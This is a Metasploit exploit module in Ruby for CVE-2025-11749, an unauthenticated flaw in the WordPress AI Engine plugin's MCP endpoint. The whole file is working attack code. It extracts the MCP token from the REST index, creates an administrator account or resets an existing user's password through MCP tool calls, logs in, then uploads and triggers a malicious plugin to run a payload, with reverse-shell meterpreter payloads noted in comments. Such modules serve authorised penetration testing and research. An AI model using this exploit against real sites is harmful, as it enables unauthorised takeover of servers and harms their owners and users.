##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2025-11749 (WordPress AI Engine plugin).
#
# Flow implemented below: discover the MCP token from the REST route index,
# call the MCP `wp_create_user` tool to create an administrator, log in with
# the new credentials, then upload a generated plugin and request its payload
# file.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Payload::Php
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck

  # Matched against MCP error messages / raw bodies to detect a pre-existing user.
  ERROR_PATTERN = /already exists|username.*taken|user.*exists/i
  # Matched against MCP result text / raw bodies to detect a successful tool call.
  SUCCESS_PATTERN = /User (?:created|updated|#\d+ updated)|success|created/i
  # REST route key that embeds the MCP token as its third path segment.
  # Anchored with \A/\z so the whole route key must match.
  MCP_ROUTE_PATTERN = %r{\A/mcp/v1/([^/]+)/sse\z}

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE',
        'Description' => %q{
          This module exploits an unauthenticated vulnerability in the WordPress AI Engine plugin
          (versions <= 3.1.3). The vulnerability allows an attacker to create an administrator
          account via the MCP (Model Context Protocol) endpoint without authentication.
          The module supports both `/wp-json/mcp/v1/` and `/?rest_route=/mcp/v1/` endpoints.
          Once an administrator account is created, the module uploads and executes a malicious
          plugin to achieve remote code execution (RCE).
        },
        'Author' => [
          'Emiliano Versini', # Vulnerability discovery
          'Khaled Alenazi (Nxploited)', # PoC
          'Valentin Lobstein ', # Metasploit module
          'dledda-r7' # Reviewer
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2025-11749'],
          ['URL', 'https://github.com/Nxploited/CVE-2025-11749']
        ],
        'Platform' => %w[php unix linux win],
        'Arch' => [ARCH_PHP, ARCH_CMD],
        'DisclosureDate' => '2025-11-04',
        'DefaultTarget' => 0,
        'Privileged' => false,
        'Targets' => [
          [
            'PHP In-Memory',
            {
              'Platform' => 'php',
              'Arch' => ARCH_PHP
              # tested with php/meterpreter/reverse_tcp
            }
          ],
          [
            'Unix/Linux Command Shell',
            {
              'Platform' => %w[unix linux],
              'Arch' => ARCH_CMD
              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'Windows Command Shell',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'Username to create', Faker::Internet.username]),
        OptString.new('PASSWORD', [true, 'Password for the new user', Faker::Internet.password(min_length: 8)]),
        OptString.new('EMAIL', [true, 'Email for the new user', Faker::Internet.email])
      ]
    )
  end

  # Decides whether the target looks exploitable.
  #
  # Returns Unknown when `wordpress_and_online?` is falsy, passes through a
  # Safe verdict from `check_plugin_version_from_readme`, returns Safe when no
  # MCP token can be found, and Appears otherwise. The discovered token is
  # cached in @token so #exploit does not have to look it up again.
  #
  # @return [Msf::Exploit::CheckCode]
  def check
    return CheckCode::Unknown unless wordpress_and_online?

    plugin_check = check_plugin_version_from_readme('ai-engine', '3.1.4')
    return plugin_check if plugin_check == CheckCode::Safe

    @token = find_token
    return CheckCode::Safe('MCP token not found. Plugin may be patched or not configured.') unless @token

    CheckCode::Appears
  end

  # Entry point: creates (or takes over) the configured account, logs in and
  # hands the session cookie to #upload_and_execute_payload.
  #
  # Aborts through `fail_with` when the target is not WordPress, no token is
  # found, the account cannot be created, or the login fails.
  #
  # @return [void]
  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?

    @token ||= find_token
    fail_with(Failure::NotVulnerable, 'MCP token not found. Plugin may be patched or not configured.') unless @token

    username = datastore['USERNAME']
    password = datastore['PASSWORD']
    email = datastore['EMAIL']

    # result is true, false or :user_exists (see #send_mcp_tool_call).
    result = create_admin_user(@token, username, password, email)
    fail_with(Failure::UnexpectedReply, 'Failed to create administrator account.') unless result

    if result == :user_exists
      print_warning('User already exists, updating password and continuing exploitation...')
      # Best effort: a failed update is only warned about, the login below decides.
      update_user_password(@token, username, password)
    end

    admin_cookie = wordpress_login(username, password)
    unless admin_cookie
      error_msg = 'Failed to log in to WordPress admin.'
      error_msg += ' User may exist with a different password.' if result == :user_exists
      fail_with(Failure::UnexpectedReply, error_msg)
    end

    upload_and_execute_payload(admin_cookie)
  end

  # REST API helpers

  # Sends a REST request, trying `/wp-json/<rest_path>` first and falling back
  # to `/?rest_route=<rest_path>` when the first attempt did not succeed.
  #
  # @param rest_path [String] REST route, e.g. '/' or '/mcp/v1/<token>/sse'
  # @param method [String] HTTP verb; 'POST' requests are sent as application/json
  # @param data [String, nil] request body
  # @return [Object, nil] whatever `send_request_cgi` returned for the attempt
  #   that was kept (nil when it returned nil)
  def send_rest_request(rest_path, method: 'GET', data: nil)
    opts = {
      'method' => method,
      'ctype' => method == 'POST' ? 'application/json' : nil,
      'data' => data
    }

    pretty_uri = normalize_uri(target_uri.path, 'wp-json', rest_path)
    res = send_request_cgi(opts.merge('uri' => pretty_uri))
    # 204 is accepted as well as 200: #send_mcp_tool_call treats it as success,
    # so falling through here would replay a non-idempotent POST (for example
    # a second wp_create_user call) against the fallback endpoint.
    return res if res && [200, 204].include?(res.code)

    fallback = {
      'uri' => normalize_uri(target_uri.path),
      'vars_get' => { 'rest_route' => rest_path }
    }
    send_request_cgi(opts.merge(fallback))
  end

  # Fetches the REST route index and extracts the MCP token from it.
  #
  # @return [String, nil] the token, or nil when none was found
  def find_token
    extract_token_from_routes(send_rest_request('/'))
  end

  # Scans the `routes` object of a REST index response for a key shaped like
  # `/mcp/v1/<token>/sse` and returns the `<token>` segment.
  #
  # @param res [Object, nil] response of the REST index request
  # @return [String, nil] first token found; nil on a non-200 response, an
  #   unexpected document shape, or when no route matches
  def extract_token_from_routes(res)
    return nil unless res&.code == 200

    document = res.get_json_document
    return nil unless document.is_a?(Hash)

    routes = document['routes']
    return nil unless routes.is_a?(Hash)

    routes.each_key do |route|
      next unless route.is_a?(String)

      token = route[MCP_ROUTE_PATTERN, 1]
      # A captured 'sse' is not accepted as a token.
      next if token.nil? || token == 'sse'

      return token
    end

    nil
  end

  # MCP API helpers

  # Sends a request to `/mcp/v1/<token>/<segments...>`.
  #
  # @param token [String] MCP token
  # @param segments [Array<String>] path segments appended after the token
  # @param method [String] HTTP verb
  # @param data [String, nil] request body
  # @return [Object, nil] see #send_rest_request
  def send_mcp_request(token, segments, method: 'GET', data: nil)
    path = "/mcp/v1/#{token}/#{segments.join('/')}"
    send_rest_request(path, method: method, data: data)
  end

  # Builds the JSON-RPC 2.0 `tools/call` body for an MCP tool invocation.
  #
  # @param tool_name [String] name of the MCP tool
  # @param arguments [Hash] tool arguments
  # @return [String] JSON document with a random request id
  def build_mcp_payload(tool_name, arguments)
    {
      'jsonrpc' => '2.0',
      'id' => rand(1..999_999),
      'method' => 'tools/call',
      'params' => {
        'name' => tool_name,
        'arguments' => arguments
      }
    }.to_json
  end

  # POSTs a `tools/call` request for the given tool to the `sse` endpoint.
  #
  # @param token [String] MCP token
  # @param tool_name [String] name of the MCP tool
  # @param arguments [Hash] tool arguments
  # @return [Object, nil] see #send_rest_request
  def post_mcp_tool_call(token, tool_name, arguments)
    payload = build_mcp_payload(tool_name, arguments)
    send_mcp_request(token, ['sse'], method: 'POST', data: payload)
  end

  # Reads `result.content` from a decoded JSON-RPC document without raising
  # when either level has an unexpected type.
  #
  # @param document [Object] decoded response document
  # @return [Object, nil] the `content` value, or nil when it is not reachable
  def mcp_result_content(document)
    result = document['result'] if document.is_a?(Hash)
    result['content'] if result.is_a?(Hash)
  end

  # Calls an MCP tool and returns the raw `result.content` of the reply.
  #
  # @param token [String] MCP token
  # @param tool_name [String] name of the MCP tool
  # @param arguments [Hash] tool arguments
  # @return [Object, nil] `result.content`, or nil on no response, a non-200
  #   status, or a reply that is not a JSON object
  def send_mcp_tool_call_raw(token, tool_name, arguments)
    res = post_mcp_tool_call(token, tool_name, arguments)
    return nil unless res&.code == 200

    mcp_result_content(res.get_json_document)
  end

  # Calls an MCP tool and classifies the outcome.
  #
  # @param token [String] MCP token
  # @param tool_name [String] name of the MCP tool
  # @param arguments [Hash] tool arguments
  # @return [true, false, Symbol] true on success (HTTP 204, or a reply
  #   matching SUCCESS_PATTERN), :user_exists when the reply reports an
  #   existing user, false otherwise
  def send_mcp_tool_call(token, tool_name, arguments)
    res = post_mcp_tool_call(token, tool_name, arguments)
    return false unless res
    return true if res.code == 204
    return false unless res.code == 200

    json_response = res.get_json_document
    return false unless json_response.is_a?(Hash)

    error = json_response['error']
    if error.is_a?(Hash)
      return :user_exists if error['code'] == 'existing_user_login'
      return :user_exists if error['message'].to_s.match?(ERROR_PATTERN)
    end

    result_content = mcp_result_content(json_response)
    if result_content.is_a?(Array)
      succeeded = result_content.any? do |item|
        item.is_a?(Hash) && item['text'].to_s.match?(SUCCESS_PATTERN)
      end
      return true if succeeded
    end

    # Last resort: classify on the raw body when the structured fields were inconclusive.
    body = res.body.to_s
    return :user_exists if body.match?(ERROR_PATTERN)
    return true if body.match?(SUCCESS_PATTERN)

    false
  end

  # User management

  # Looks up the numeric ID of a user through the `wp_get_users` MCP tool.
  #
  # Each content item's `text` is parsed as JSON (a single object or an array
  # of objects); entries that are not JSON objects are skipped.
  #
  # @param token [String] MCP token
  # @param username [String] exact `user_login` to look for
  # @return [Integer, nil] the user's ID, or nil when it could not be determined
  def get_user_id(token, username)
    arguments = {
      'search' => username,
      'search_columns' => ['user_login']
    }

    result_content = send_mcp_tool_call_raw(token, 'wp_get_users', arguments)
    return nil unless result_content.is_a?(Array)

    result_content.each do |item|
      next unless item.is_a?(Hash) && item['text']

      begin
        users = JSON.parse(item['text'].to_s)
      rescue JSON::ParserError
        next
      end

      users = [users] unless users.is_a?(Array)
      # Parsed JSON may hold null/scalars; only objects can carry user fields.
      user = users.find { |u| u.is_a?(Hash) && u['user_login'] == username }
      return user['ID'].to_i if user && user['ID']
    end

    nil
  end

  # Requests creation of an administrator through the `wp_create_user` MCP tool.
  #
  # @param token [String] MCP token
  # @param username [String] login name
  # @param password [String] password
  # @param email [String] email address
  # @return [true, false, Symbol] see #send_mcp_tool_call
  def create_admin_user(token, username, password, email)
    arguments = {
      'user_login' => username,
      'user_email' => email,
      'user_pass' => password,
      'role' => 'administrator'
    }

    send_mcp_tool_call(token, 'wp_create_user', arguments)
  end

  # Sets the password of an existing user through the `wp_update_user` MCP tool.
  #
  # Failures are reported with a warning only; the caller continues to the login.
  #
  # @param token [String] MCP token
  # @param username [String] login name of the existing user
  # @param password [String] new password
  # @return [true, false, Symbol] false when the user ID could not be resolved,
  #   otherwise the result of #send_mcp_tool_call
  def update_user_password(token, username, password)
    user_id = get_user_id(token, username)
    unless user_id
      print_warning('Could not determine the ID of the existing user, attempting login anyway...')
      return false
    end

    arguments = {
      'ID' => user_id,
      'fields' => {
        'user_pass' => password
      }
    }

    result = send_mcp_tool_call(token, 'wp_update_user', arguments)
    print_warning('Password update may have failed, attempting login anyway...') unless result
    result
  end

  # Payload execution

  # Generates a plugin with random names, uploads it using the given cookie,
  # registers the dropped files for cleanup and requests the payload file.
  #
  # `generate_plugin`, `wordpress_upload_plugin` and `wordpress_url_plugins`
  # are not defined in this file; presumably they come from the included
  # WordPress mixin.
  #
  # @param admin_cookie [String] cookie returned by `wordpress_login`
  # @return [Object, nil] result of the final `send_request_cgi` call
  def upload_and_execute_payload(admin_cookie)
    plugin_name = "wp_#{Rex::Text.rand_text_alphanumeric(5).downcase}"
    payload_name = "ajax_#{Rex::Text.rand_text_alphanumeric(5).downcase}"

    zip = generate_plugin(plugin_name, payload_name)
    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded

    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
    register_dir_for_cleanup("../#{plugin_name}")

    payload_file = "#{payload_name}.php"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_file)
    send_request_cgi('uri' => payload_uri, 'method' => 'GET')
  end
end